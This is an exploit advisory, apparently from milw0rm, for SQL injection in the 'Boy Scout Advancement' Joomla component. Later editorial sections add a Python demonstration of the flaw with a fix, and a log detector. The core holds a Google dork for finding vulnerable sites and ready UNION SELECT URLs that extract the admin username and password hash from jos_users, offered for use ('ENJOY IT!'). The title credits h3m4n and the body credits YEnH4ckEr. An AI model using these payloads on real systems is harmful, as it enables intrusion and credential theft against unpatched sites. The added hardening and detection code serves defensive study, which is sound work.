Joomla Boy Scout Advancement 0.3 id SQL Injection Exploit by h3m4n

***********************************************************************************************
***********************************************************************************************
**                                                                                           **
**                                                                                           **
**     [] [] [] [][][][> []       [] [][ ][]       []   [][]] [] [> [][][][> [][][][]        **
**     || || || []         [][]   []   [] []      []   []      [] []   []        []    []    **
** [> [][][][] [][][][> [] [] []       [] []    [][] []        [][]    [][][][> []     []    **
** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\
**==[>    []     []        []   [][]   [] [] [][][] []         [][]    []           [] [] >>--
** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/
   [>   [[[]]]   [][][][> [][]    [] [][[] [[]] [][] [][][] [] [> [][][][> <][]        []    **
**                                                                                           **
**                                                                                           **
**                   LONG LIVE SPAIN!... WE'LL WIN THE WORLD CUP!... o.O                     **
**                                      PROUD TO BE SPANISH!                                 **
**                                                                                           **
***********************************************************************************************
***********************************************************************************************

----------------------------------------------------------------------------------------------
                             MULTIPLE SQL INJECTION VULNERABILITIES
----------------------------------------------------------------------------------------------

CMS INFORMATION:    Joomla Component 'Boy Scout Advancement' <= v0.3 (com_bsadv)

-->WEB: http://bsadv.sourceforge.net/
-->DOWNLOAD: http://bsadv.sourceforge.net/
-->DEMO: N/A
-->CATEGORY: Joomla/Component
-->DESCRIPTION: BSAdv is a Joomla 1.5 component for Boy Scout unit data and advancement
                data for Boy Scout Troops in the United States.
-->RELEASED: 2009-02-01

CMS VULNERABILITY:

-->TESTED ON: Firefox 3
-->DORK --> inurl:"?option=com_bsadv"
-->CATEGORY: SQL INJECTION
-->AFFECTED VERSIONS: <= 0.3
-->Bug discovered: 2009-05-25
-->Bug reported: 2009-05-25
-->Bug fixed: Not fixed
-->Patch info: Not fixed
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: To my girlfriend Marijose... my brother, sister-in-law and parents (and friends xD) for their support.
-->EXTRA-COMMENT: Thanks to all of you for putting up with me! (Love you, little one!)
----------------------------------------------------------------------------------------------


############################
///////////////////////////

SQL INJECTION VULNS (SQLi):

///////////////////////////
############################



<<<<---------++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++--------->>>>

(The injection point is the numeric 'id' value, concatenated straight into the SQL statement.
No quote character is needed to break out, so magic_quotes_gpc makes no difference either way.
The leading -1 makes the component's own query match nothing, so the row returned by the
UNION is what gets rendered; the trailing %23 is '#', which comments out the rest of the
statement.)



-------------------
PROOFS OF CONCEPT:
-------------------



[++] GET var --> 'id'   (task=event: the query selects 4 columns, so the UNION needs 4)

~~~~> http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=event&id=-1+UNION+ALL+SELECT+1,version(),database(),user()%23


[++] GET var --> 'id'   (task=account: the query selects 2 columns, so the UNION needs 2)

~~~~> http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=account&id=-1+UNION+ALL+SELECT+database(),version()%23&Itemid=57



[++[Return]++] ~~~~~> MySQL user, version or database name, shown in the response in place of
                      the event/account fields.
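The bug class behind both PoCs, as an added example that is not from the advisory or from the BSAdv component: the 'id' value is pasted into the statement text, so -1 empties the real result set and the UNION row is what comes back. The model below runs the task=account payload against an in-memory SQLite database with a constructed jos_users row next to the same lookup done with an integer check and a bound parameter. The component's own table name (bsadv_accounts), its columns and all row data are assumptions; the trailing %23 (MySQL's '#' comment) is left off the constructed URL because SQLite does not treat '#' as a comment and nothing follows id in the modelled statement anyway.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit


def build_db():
    # Constructed fixture (not real data): a stand-in for Joomla 1.5's jos_users
    # table plus an assumed component table; the advisory does not name the latter.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE jos_users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO jos_users VALUES (62, 'admin', 'f8c5c1c2d7a1b3a9e0d4c6b2a1f0e9d8:Xy7Qp2Lm');
        CREATE TABLE bsadv_accounts (id INTEGER, name TEXT, balance TEXT);
        INSERT INTO bsadv_accounts VALUES (1, 'Troop 1 dues', '42.00');
    """)
    return db


def id_from_url(url):
    # Extract the id parameter the way PHP's $_GET sees it ('+' -> space, %xx decoded).
    return parse_qs(urlsplit(url).query)["id"][0]


def vulnerable_lookup(db, id_param):
    # The flaw: the raw GET value becomes part of the statement text.
    sql = "SELECT name, balance FROM bsadv_accounts WHERE id=" + id_param
    return db.execute(sql).fetchall()


def hardened_lookup(db, id_param):
    # The fix: accept only digits, then bind the value as a parameter.
    # (In Joomla 1.5 terms: JRequest::getInt('id') and $db->Quote(), never raw $_GET.)
    if not re.fullmatch(r"[0-9]+", id_param):
        raise ValueError("id must be a non-negative integer")
    return db.execute(
        "SELECT name, balance FROM bsadv_accounts WHERE id=?", (int(id_param),)
    ).fetchall()


# Constructed URL following the advisory's task=account payload; the host is a placeholder.
POC_URL = (
    "http://example.invalid/index.php?option=com_bsadv&controller=peruse"
    "&task=account&id=-1+UNION+ALL+SELECT+username,password+FROM+jos_users+WHERE+id=62&Itemid=57"
)

if __name__ == "__main__":
    db = build_db()
    payload = id_from_url(POC_URL)
    print("decoded id :", payload)
    print("vulnerable :", vulnerable_lookup(db, payload))   # leaks the jos_users row
    try:
        hardened_lookup(db, payload)
    except ValueError as exc:
        print("hardened   :", exc)                          # rejected before reaching SQL
```

The vulnerable call returns the admin username and password hash for an id that should have matched nothing; the hardened call rejects the same value before it reaches the database, and the bound parameter would stop it even if the digit check were dropped.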



-----------
EXPLOITS:
-----------



~~~~> http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=event&id=-1+UNION+ALL+SELECT+1,concat(username,0x3A3A3A,password),3,4+FROM+jos_users+WHERE+id=62%23



[++[Return]++] ~~~~~> Username:::password of the jos_users row with id=62 (0x3A3A3A is the ':::'
                      separator; id=62 is the Super Administrator created by the Joomla 1.5
                      installer; the concat sits in column 2 because that is the one rendered).


~~~~> http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=account&id=-1+UNION+ALL+SELECT+username,password+FROM+jos_users+WHERE+id=62%23&Itemid=57



[++[Return]++] ~~~~~> Username and password of the jos_users row with id=62. Joomla 1.5 stores
                      passwords as md5(password.salt):salt, so what comes back is the hash plus
                      its salt, not a cleartext password.
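What the two exploit requests look like in a web server's access log, and a small detector for them, as an added example that is not part of the advisory. The log lines are constructed (Apache combined log format, documentation-range addresses, not real traffic); the detector parses each request's query string, limits itself to option=com_bsadv, ignores well-formed integer ids, and separates UNION/SELECT or jos_ table references ('sqli') from merely malformed values ('malformed'). The regexes and thresholds are the editor's choices, not a published signature.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines; the fifth one targets another component and must not be flagged.
SAMPLE_LOG = """\
203.0.113.5 - - [26/May/2009:10:01:12 +0200] "GET /index.php?option=com_bsadv&controller=peruse&task=event&id=7 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [26/May/2009:10:01:40 +0200] "GET /index.php?option=com_bsadv&controller=peruse&task=event&id=-1+UNION+ALL+SELECT+1,version(),database(),user()%23 HTTP/1.1" 200 611 "-" "Mozilla/5.0"
203.0.113.9 - - [26/May/2009:10:02:03 +0200] "GET /index.php?option=com_bsadv&controller=peruse&task=account&id=-1+UNION+ALL+SELECT+username,password+FROM+jos_users+WHERE+id=62%23&Itemid=57 HTTP/1.1" 200 640 "-" "Mozilla/5.0"
203.0.113.7 - - [26/May/2009:10:02:30 +0200] "GET /index.php?option=com_bsadv&controller=peruse&task=account&id=abc HTTP/1.1" 200 300 "-" "Mozilla/5.0"
198.51.100.2 - - [26/May/2009:10:03:30 +0200] "GET /index.php?option=com_content&view=article&id=-1+UNION+SELECT+1 HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

# Combined log format: client, identd, user, [timestamp], "METHOD target protocol", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# UNION ... SELECT anywhere in the value, or a reference to a Joomla core table.
SQLI_RE = re.compile(r"\bunion\b.*\bselect\b|\bjos_[a-z_]+\b", re.IGNORECASE)


def classify_id(value):
    """None for a clean integer id, 'sqli' for an injection pattern, 'malformed' otherwise."""
    if re.fullmatch(r"[0-9]+", value):
        return None
    if SQLI_RE.search(value):
        return "sqli"
    return "malformed"


def suspicious_requests(log_text, option="com_bsadv"):
    """Return (ip, timestamp, task, verdict, decoded_id) for every non-integer id sent to the component."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        params = parse_qs(urlsplit(m["target"]).query)
        if params.get("option", [""])[0] != option or "id" not in params:
            continue
        ident = params["id"][0]  # decoded like PHP would: '+' -> ' ', %23 -> '#'
        verdict = classify_id(ident)
        if verdict:
            hits.append((m["ip"], m["ts"], params.get("task", [""])[0], verdict, ident))
    return hits


if __name__ == "__main__":
    for ip, ts, task, verdict, ident in suspicious_requests(SAMPLE_LOG):
        print(f"{ts} {ip:<14} task={task:<8} {verdict:<9} id={ident!r}")
```

Decoding the query string before matching matters: the '+'-encoded spaces and %23 in the advisory's URLs would otherwise defeat a signature written against the raw request line. The same id check is worth keeping even after the component is fixed, since an integer-only rule on that parameter has no false positives for legitimate traffic.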



<<<-----------------------------EOF---------------------------------->>>ENJOY IT!


#######################################################################
#######################################################################
##*******************************************************************##
## SPECIAL THANKS TO: Str0ke and every H4ck3r (all who do milw0rm)!  ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: JosS, Ulises2k, J.McCray and Spanish Hack3Rs community!##
##*******************************************************************##
#######################################################################
#######################################################################

# milw0rm.com [2009-05-26]